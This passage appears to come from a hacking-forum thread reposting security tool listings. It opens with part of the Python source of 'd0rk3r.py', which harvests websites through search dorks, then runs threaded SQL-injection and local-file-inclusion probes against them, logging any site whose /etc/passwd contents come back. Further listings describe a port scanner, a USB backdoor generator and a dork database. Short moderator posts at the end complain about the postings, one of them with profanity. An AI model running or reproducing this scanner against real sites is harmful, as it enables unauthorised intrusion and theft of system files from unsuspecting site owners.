G+"[+] Checking:",lfiurl+lfi.replace("\n", "") #print try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"w00t!,w00t!: ", O+lfiurl+lfi logfile.write("\n"+lfiurl+lfi) except: pass parser = OptionParser() parser.add_option("-i" ,type='string', dest='inurl',action='store', default="0wn3d_by_baltazar", help="inurl: operator") parser.add_option("-s", type='string', dest='site',action='store', default="com", help="site: operator") parser.add_option("-c", type='string', dest='cxe',action='store', default='redfront', help="custom search engine (blackle,ssearch,redfront,bitcomet,dapirats,darkc0de,googuuul)") parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="server side language filetype") parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="max results (default 500)") (options, args) = parser.parse_args() logo() if options.inurl != None: print B+"[+] inurl :",options.inurl go_inurl = 'inurl:'+options.inurl if options.inurl != None: if options.filetype in filetypes: print "[+] filetype :",options.filetype go_ftype = 'inurl:'+options.filetype else: print "[+] inurl-filetype : php" go_ftype = 'inurl:php' if options.site != None: print "[+] site :",options.site go_site = 'site:'+options.site if options.cxe != None: if options.cxe in CXdic.keys(): print "[+] CXE :",CXdic[options.cxe] ccxe = CXdic[options.cxe] else: print "[-] CXE : no Proper CXE defined, using redfront" ccxe = CXdic['redfront'] go_cxe = 'cx='+ccxe print "[+] MaxRes :",options.maxcount cuRLS = cxeSearch(go_inurl,go_site,go_cxe,go_ftype,options.maxcount) mnu = True while mnu == True: print G+"\n[1] Injection Testing" print "[2] LFI Testing" print "[0] Exit\n" chce = raw_input(":") if chce == '1': print "\n[+] Preparing for SQLi scanning ... " print "[+] Can take a while ..." print "[!] 
Working ...\n" i = len(cuRLS) / int(numthreads) m = len(cuRLS) % int(numthreads) z = 0 if len(threads) <= numthreads: for x in range(0, int(numthreads)): sliced = cuRLS[x*i:(x+1)*i] if (z < m): sliced.append(cuRLS[int(numthreads)*i+z]) z += 1 thread = injThread(sliced) thread.start() threads.append(thread) for thread in threads: thread.join() if chce == '2': print "\n[+] Preparing for LFI scanning ... " print "[+] Can take a while ..." print "[!] Working ...\n" i = len(cuRLS) / int(lfinumthreads) m = len(cuRLS) % int(lfinumthreads) z = 0 if len(threads) <= lfinumthreads: for x in range(0, int(lfinumthreads)): sliced = cuRLS[x*i:(x+1)*i] if (z < m): sliced.append(cuRLS[int(lfinumthreads)*i+z]) z += 1 thread = lfiThread(sliced) thread.start() threads.append(thread) for thread in threads: thread.join() if chce == '0': print R+"\n[-] Exiting ..." mnu = False Download: http://dl.packetstormsecurity.net/UNIX/scanners/d0rk3r.py.txt
  20. Multi Threaded TCP Port Scanner 1.3
This is a basic TCP SYN scanner that is multi-threaded. (Linux)
Download: http://dl.packetstormsecurity.net/UNIX/scanners/threaded-port-scanner-1.3.zip
  21. USBsploit 0.6
USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterpreter script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework.
Changes: Various updates and some bug fixes.
Download: http://dl.packetstormsecurity.net/UNIX/utilities/usbsploit-0.6-BETA-linux-i686.tar.gz
Information: http://secuobs.com/
  22. WhatWeb Scanner 0.4.7
WhatWeb is a next-generation web scanner. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade-off between speed and reliability.
Changes: Performance enhancements and bug fixes.
Download: http://dl.packetstormsecurity.net/UNIX/scanners/whatweb-0.4.7.tar.gz
Full details: http://www.morningstarsecurity.com/research/whatweb
  23. Google Hack DB Tool 1.0
Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. Dorks...
Download: http://dl.packetstormsecurity.net/UNIX/scanners/google-hack-db-tool-1.0.zip
  24. Banned most of them. Why the fuck are you posting nonsense? Just so you know, so that in the future neither you nor anyone else posts nonsense just to look busy.
  25. Pax, you are getting worse (in the bad sense) by the day, you disappoint me...